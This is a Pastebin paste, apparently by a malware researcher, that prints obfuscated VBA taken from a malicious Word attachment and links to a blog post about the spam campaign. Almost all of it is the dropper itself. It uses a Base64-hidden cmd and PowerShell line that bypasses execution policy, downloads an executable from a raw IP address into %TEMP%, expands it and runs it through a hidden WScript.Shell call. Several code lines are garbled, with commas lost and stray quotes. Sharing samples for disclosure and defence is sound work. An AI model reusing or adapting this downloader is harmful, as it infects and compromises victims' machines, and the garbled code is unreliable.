dynamoo

Malicious macro from OLE embedded object

Mar 19th, 2015
411
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. VBA from malicious OLE objected embedded in DOC.
  2. http://blog.dynamoo.com/2015/03/malware-spam-aspiring-solicitors-debt.html
  3. -------------------
  4. Doc_SI2ev??slx.vbsC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev??slx.vbs4C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev??slx.vbshGVhkjbjv = Base64Decode("Y21kIC9LIHBvd2Vyc2hlbGwuZXhlIC1FeGVjdXRpb25Qb2xpY3kgYnlwYXNzIC1ub3Byb2ZpbGUgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cDovLzkxLjIyNy4xOC43Ni9zbW9venkvc2hha2UuZXhlJywnJVRFTVAlXEpJT2lvZGZoaW9JSC5jYWInKTsgZXhwYW5kICVURU1QJVxKSU9pb2RmaGlvSUguY2FiICVURU1QJVxKSU9pb2RmaGlvSUguZXhlOyBzdGFydCAlVEVNUCVcSklPaW9kZmhpb0lILmV4ZTs=")                   
  5. CreateObject(Base64Decode("V1NjcmlwdC5TaGVsbA==")).Run(""& GVhkjbjv &"")    0              
  6. Function Base64Decode(ByVal base64String)                  
  7.                    
  8.   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"                
  9.   Dim dataLength     sOut    groupBegin        
  10.                    
  11.                    
  12.   base64String = Replace(base64String    vbCrLf """)
  13.  base64String = Replace(base64String, vbTab, "")
  14.   base64String = Replace(base64String, "" " """)
  15.  
  16.  dataLength = Len(base64String)
  17.  If dataLength Mod 4 <> 0 Then
  18.     Err.Raise 1, ""Base64Decode"    Bad Base64 string
  19.     Exit Function                  
  20.   End If                   
  21.                    
  22.   For groupBegin = 1 To dataLength Step 4                  
  23.     Dim numDataBytes     CharCounter     thisChar    thisData    nGroup  pOut
  24.     numDataBytes = 3                   
  25.     nGroup = 0                 
  26.                    
  27.     For CharCounter = 0 To 3                   
  28.       thisChar = Mid(base64String    groupBegin + CharCounter    1)        
  29.                    
  30.       If thisChar = "=" Then                   
  31.         numDataBytes = numDataBytes - 1                
  32.         thisData = 0                   
  33.       Else                 
  34.         thisData = InStr(1   Base64  thisChar    vbBinaryCompare) - 1      
  35.       End If                   
  36.       If thisData = -1 Then                
  37.         Err.Raise 2 Base64Decode    Bad character In Base64 string.        
  38.         Exit Function                  
  39.       End If                   
  40.                    
  41.       nGroup = 64 * nGroup + thisData                  
  42.     Next                   
  43.                        
  44.                    
  45.     nGroup = Hex(nGroup)                   
  46.                        
  47.     nGroup = String(6 - Len(nGroup) "0"") & nGroup
  48.    
  49.    pOut = Chr(CByte(""&H"" & Mid(nGroup, 1, 2))) + _
  50.      Chr(CByte(""&H"" & Mid(nGroup, 3, 2))) + _
  51.      Chr(CByte(""&H"" & Mid(nGroup, 5, 2)))
  52.    
  53.  
  54.    sOut = sOut & Left(pOut, numDataBytes)
  55.  Next
  56.  
  57.  Base64Decode = sOut
  58. End Function3C:\Users\sgsd\AppData\Local\Temp\Doc_SI2ev.  slx.vbsDoc_SI2ev.  slx.vbsWC:\Users\sgsd\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Doc_SI2ev.  slx.vbs
  59. "
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×